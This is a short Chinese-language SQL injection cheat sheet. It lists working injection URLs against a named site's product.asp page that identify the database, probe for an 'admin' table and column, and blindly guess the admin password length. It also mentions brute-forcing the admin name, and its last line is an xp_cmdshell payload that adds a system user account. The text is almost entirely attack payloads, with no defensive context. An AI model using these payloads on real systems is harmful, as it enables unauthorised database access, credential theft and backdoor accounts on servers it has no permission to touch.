查询数据库类型 http://www.zengke.com/product.asp?sort_id=24 and exists (select * from sysobjects)
查询表admin页面返回正常显示为有,错误为无。 http://www.zengke.com//product.asp?sort_id=24 and exists (select * from admin)
查询admin表中的项admin /product.asp?sort_id=24 and exists (select admin_name from admin)
查询admin表中的项admin里面的内容长度 小于出错 等于返回正常 http://www.zengke.com//product.asp?sort_id=24 And (Select Top 1 len(cstr([pwd])) From (Select Top 1 * From [admin] Where 1=1 Order by [pwd]) T Order by [pwd] desc)<=7
暴力猜解admin表中的项admin_name
SQL
①http://Site/url.asp?id=1;exec master..xp_cmdshell “net user name password /add”--